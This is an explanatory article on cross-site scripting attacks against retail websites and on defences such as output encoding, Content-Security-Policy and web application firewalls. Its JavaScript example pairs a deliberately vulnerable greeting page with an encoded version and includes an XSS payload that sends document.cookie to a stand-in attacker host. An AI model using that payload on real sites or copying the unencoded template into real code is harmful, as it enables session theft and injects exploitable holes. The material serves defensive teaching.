The modern organization is extremely reliant upon its web presence. The average customer would much rather do their shopping from the comfort of their couch than go to a brick and mortar retail location to browse. Additionally, eCommerce has enabled businesses to expand their reach far beyond where they have physical outlets.
However, with this dependence comes exposure. If an organization’s website is attacked, the result can be lost revenue, reputational damage and, where the incident involves a breach of customers’ sensitive data, regulatory scrutiny. Retailers therefore have to defend against a wide range of online attacks, and in recent years cross-site scripting (XSS) has become one of the most common of them.
What is Cross-Site Scripting?
Cross-site scripting attacks target vulnerable web pages. They take advantage of how web pages are put together: the browser parses whatever HTML it receives and cannot tell markup and script the developer wrote from markup and script an attacker managed to slip into the page, so it renders and runs both. The injected code can then be used for a variety of purposes, including credit card skimming, theft of other browser data (cookies and session tokens, form contents), crypto mining, and serving other malware to the user.
- Anatomy of a Web Page
Web pages are typically .html files, meaning the primary type of code in the file is HTML. HTML is the language that defines the content and structure of a page: its sections, its text, and high-level information about how it should be displayed (heading levels, placement, and so on). Most pages also carry two other types of content: CSS, which controls presentation, and JavaScript, which adds behaviour and executes in the visitor’s browser.
These other types of content can either live in their own files that the main HTML file references and imports, or be embedded directly in the HTML. Embedded content must be wrapped in the right tags (<style></style> for CSS, <script></script> for JavaScript) and is applied or executed while the page is being rendered in the user’s browser.
- Inserting Malicious Code
The ability to import or embed script in HTML pages is not a problem in itself; the problem arises when a page takes data it does not control (a URL parameter, a form field, a product review) and writes it into its HTML without encoding it, because the browser then has no way to separate the developer’s markup from the attacker’s. If an attacker can get their own malicious code embedded in a legitimate web page this way, it runs in the browser of every user who visits, with that user’s session and privileges on the site. This is a cross-site scripting (XSS) attack.
XSS attacks come in several varieties. Reflected XSS takes advantage of web pages that copy data from the request, usually the URL, into the page’s HTML. An example would be a page that greets the visitor by name and takes that name from a URL parameter. Putting a script in that parameter in place of a name and sending the link to an unsuspecting user pulls off a simple reflected XSS attack. Stored XSS works the same way except that the payload is saved on the server (in a comment or review, say) and served to every later visitor, while DOM-based XSS occurs when the page’s own client-side script writes untrusted data into the document.
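The greeting page described above, as an added example that is not code from the original article: a function that builds the page by dropping the `name` URL parameter straight into the HTML (the reflected XSS bug), beside the same page with contextual HTML output encoding applied. The function names, the `shop.example` and `attacker.example` hosts, and the attack link are this example’s own constructions.

```javascript
// Added example (not from the original article): a page that greets the
// visitor by name taken from the URL, first as a reflected-XSS-vulnerable
// template and then with HTML output encoding applied at the point of
// insertion. Function names and hosts are this example's own.

// The five characters that matter in an HTML text/attribute context, mapped
// to entity references. Encoding is done at output time, for the context
// the data lands in (here: HTML body text).
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Pulls the "name" query parameter out of the request URL, as the greeting
// page in the text would. Falls back to "visitor" when it is absent.
function nameFromUrl(requestUrl) {
  const params = new URL(requestUrl).searchParams;
  return params.get('name') ?? 'visitor';
}

// VULNERABLE: untrusted input is concatenated straight into the markup, so
// whatever the attacker places in ?name= becomes part of the page's HTML.
function renderGreetingVulnerable(requestUrl) {
  const name = nameFromUrl(requestUrl);
  return `<html><body><h1>Welcome back, ${name}!</h1></body></html>`;
}

// HARDENED: the same page, but the input is entity-encoded for the HTML text
// context it is inserted into. "<script>" reaches the browser as the literal
// text "&lt;script&gt;" and is never parsed as an element.
function renderGreetingSafe(requestUrl) {
  const name = nameFromUrl(requestUrl);
  return `<html><body><h1>Welcome back, ${escapeHtml(name)}!</h1></body></html>`;
}

// Constructed attack link of the kind the text describes: the "name" is a
// script that sends document.cookie to a host the attacker controls.
// (attacker.example is a reserved example domain, not a real site.)
const PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const ATTACK_URL = 'https://shop.example/greet?name=' + encodeURIComponent(PAYLOAD);

// A check a test suite can run against rendered output: does the page contain
// a script element as markup (as opposed to as encoded text)?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('Vulnerable page carries a script element:', containsScriptTag(renderGreetingVulnerable(ATTACK_URL)));
  console.log('Hardened page carries a script element:  ', containsScriptTag(renderGreetingSafe(ATTACK_URL)));
}
```

The fix is deliberately at the output, not the input: the same name may later be written into a JavaScript string, a URL or an attribute, and each of those contexts needs its own encoding, which is why blanket input “sanitising” on the way in is not enough.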
The Growth of Cross-Site Scripting
Cross-site scripting is an extremely common but often discounted or undervalued type of cyberattack. According to recent research, 40% of the online cyberattacks performed against European and North American retailers in 2019 included an XSS attack.
Despite the high rate of XSS attacks, many companies rate them low in their bug bounty programs. The reasoning is that a single XSS bug is unlikely, on its own, to cause the kind of massive data breach that brings reputational damage and large fines under the General Data Protection Regulation (GDPR) and from other regulators.
However, this does not mean that an organization cannot suffer a massive breach through an XSS vulnerability. Credit card skimmers often use XSS vulnerabilities to inject their malicious code into a checkout page, and the well-known British Airways breach demonstrates that these attacks can carry extremely high regulatory penalties.
Even though individual XSS findings are paid less than other vulnerability classes, XSS still accounts for the majority of bug bounty payouts, a reflection of how many of these vulnerabilities are being found. This underscores the growth of XSS as a threat to organizations’ website security: these vulnerabilities are being detected (and exploited) more often, by bug bounty hunters and cybercriminals alike.
Defeating Cross-Site Scripting Attacks
Cross-site scripting is not a new class of web application vulnerability. It has featured on the OWASP Top Ten list of web application security risks across multiple editions (the list is revised every few years). Despite that billing, the vulnerability persists in web application code, largely because many developers do not receive the security training needed to recognise and remediate it, and because the fix, encoding every piece of untrusted data for the context it is written into, has to be applied consistently at every output point in the application.
As a result, organizations must take additional steps to protect themselves against XSS vulnerabilities. For XSS and other common web application vulnerabilities, deploying a web application firewall (WAF) is a sensible layer, since it can identify and block many exploitation attempts before they reach the vulnerable application. A WAF is a compensating control rather than a fix, however: signature-based filters can be bypassed with alternative encodings and tag constructions, so it belongs alongside correct output encoding in the application and a Content-Security-Policy header that keeps injected script from executing even when an encoding mistake slips through. Deploying a leading WAF is still a good idea, since such products commonly cover far more than the set of vulnerabilities on OWASP’s list, providing broader protection for an organization’s web presence.